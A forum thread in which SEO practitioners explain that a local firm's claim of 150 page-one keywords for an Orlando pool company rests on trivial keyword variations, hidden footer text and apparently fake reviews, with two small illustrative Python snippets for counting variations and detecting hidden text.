How does someone rank on page one of Google for one domain for over 150 keywords?
-
A local SEO is proclaiming his fantastic track record for a pool company (amongst others) in our local market: over 150 keywords on page one of Google. I checked out a few things using some Moz tools and didn't find anything that would suggest this has come from white hat strategies, tactics, links, etc. I'm interested in how he is doing this and whether it is white hat. Thanks, C
-
There very well could be, but I didn't look deeply at all. I never even went past the first page of the site. I saw the footer and the phony review and quickly determined the SEO company was using poor techniques to manipulate results, and I would not want to expose a site to those methods.
-
Ryan,
Thanks for the analysis on local and the reviews. I suppose it is just an accumulation of several things, although I thought there might be something a bit more sophisticated at hand.
-
The results are greatly exaggerated. While it is true that each variation of a term can be counted separately, there is nothing amazing about receiving the same results for these minor variations.
If your site already ranks #1 for "Orlando Pool Repair", then earning the #1 ranking for "Orlando FL Pool Repair", "Orlando Pool Repairs", "Orlando FL Pool Repairs", "Orlando Pool Pump Repair", "Orlando Pool Pump Repairs", "Orlando Pool Pumps" and numerous other variations is all helpful and good, but hardly impressive.
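To illustrate how quickly such a keyword count inflates, here is a minimal Python sketch (the location and service lists are hypothetical examples, not taken from the site in question) that expands one head term into dozens of trivially related variations:

```python
from itertools import product

def expand_keywords(city, state, services):
    """Expand a head term into the kind of minor variations that
    pad out a '150 keywords on page one' claim."""
    locations = [city, f"{city} {state}"]   # e.g. "Orlando", "Orlando FL"
    variations = set()
    for loc, svc in product(locations, services):
        variations.add(f"{loc} {svc}")       # singular form
        variations.add(f"{loc} {svc}s")      # plural form
    return sorted(variations)

keywords = expand_keywords("Orlando", "FL",
                           ["Pool Repair", "Pool Pump Repair", "Pool Cleaning"])
print(len(keywords))  # 2 locations x 3 services x 2 forms = 12 variations
```

Add a handful of neighboring towns and zip codes to the location list and one genuinely strong head ranking balloons into "150 keywords" with no extra SEO effort.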
Also note the site's organic listing is not even listed on the first page of Google SERP. It is their Google Local listing that ranks first (A) position. Notice the (D) position SERP result for orlandopool.com? The orlandopool.com site also is the 4th organic listing on the page.
What stands out to me about this site is they have 11 reviews. The other 6 local listings combined have 15 reviews. Notice their 4th review? Guess what. Brandtastic, the SEO company, gave them a Google review. I'm pretty sure if they were caught for this manipulation they would get thrown in the penalty box.
It looks like on April 14, 2010 the second Google review, a negative one, was posted. It seems clear to me the site has, in one form or another, "acquired" multiple positive reviews which are not authentic. Notice there is another positive review on July 5th, the same day as the Brandtastic review. The April 18th, 2010 review also seems highly suspect.
Despite 2 highly negative Google reviews, they do have 9 great reviews, which gives the business a lot of credibility. They also have an A+ BBB rating, which helps, along with a decently designed site with social integration, a blog, 40 years in business, etc.
The key point is that this site does well in local SEO due to clear manipulations and some tactics, which Keri pointed out, that are definitely not a positive SEO approach. It would not surprise me at all if this site disappeared from the SERPs at some point.
-
I didn't think the greyed-out text in the footer would actually make much difference in ranking; it seems pretty old-school black hat. Sure, agreed, ranking doesn't mean conversion. It doesn't appear that there are bulk keyword domains with redirects.
-
Does anyone search those terms? Do those terms convert?
To answer your question, one of the ways one ranks is to put light-colored text on a light-colored background on each page, with the following in a spammy footer:
Orlando Pool Service - Orlando Pool Cleaning - Orlando Pool Repairs - Orlando Pool Remodeling - Orlando Pool Renovations - Winter Park, FL - Winter Park Pool Service - Winter Park Pool Service - Winter Park Pool Remodeling - Orlando, FL - Maitland, FL - College Park - Windermere, FL - Longwood, FL - Casselberry, Fl - Lake Mary, FL - Goldenrod, FL - Heathrow, FL - 32825 - 34786 - 32750 - 32779 32714 - 32810 - 32751 - 32707 - 32835 - 32828 - 32801 - 32803 - 32806 - 32789 - 32746 - 32712 - 33880 - 33881 - 33884 - 33801 - 33805 - 33803
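As a rough way to spot this trick programmatically, here is a minimal Python sketch. It is a heuristic only: it checks inline `style` attributes with a regex, so it assumes the hidden text is styled inline; a real audit would need a CSS-aware renderer, since the color can just as easily come from a stylesheet.

```python
import re

def find_hidden_text(html):
    """Flag elements whose inline style sets the text color equal to the
    background color -- the classic light-text-on-light-background trick.
    Rough heuristic: only catches inline styles, not external CSS."""
    hidden = []
    # Capture the tag's style attribute and its immediate inner text.
    for match in re.finditer(r'<(\w+)[^>]*style="([^"]*)"[^>]*>([^<]*)<', html):
        tag, style, text = match.groups()
        color = re.search(r'(?<!-)color:\s*(#?\w+)', style)
        background = re.search(r'background(?:-color)?:\s*(#?\w+)', style)
        if color and background and color.group(1).lower() == background.group(1).lower():
            hidden.append(text.strip())
    return hidden

sample = '<div style="background:#eeeeee; color:#eeeeee">Orlando Pool Service - Orlando Pool Cleaning</div>'
print(find_hidden_text(sample))
```

Google's own quality guidelines have treated hidden text like this as webspam for years, which is why the footer above is such a red flag.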
-
Hi Ryan
The company is allpool.com and the keywords are listed here: brandtastic.us/seo-allpoolrankings.htm Thanks, C
-
Well, if the keywords were "fsafsdaf" and "iosdfosdjfsadlf" and the like, you may have a chance.
-
Hi Charles.
We would love to offer feedback. What would help is the URL of the site along with some of the keywords which are involved. With that information we can offer a specific reply. Without it, we are left to a long list of generic guesses.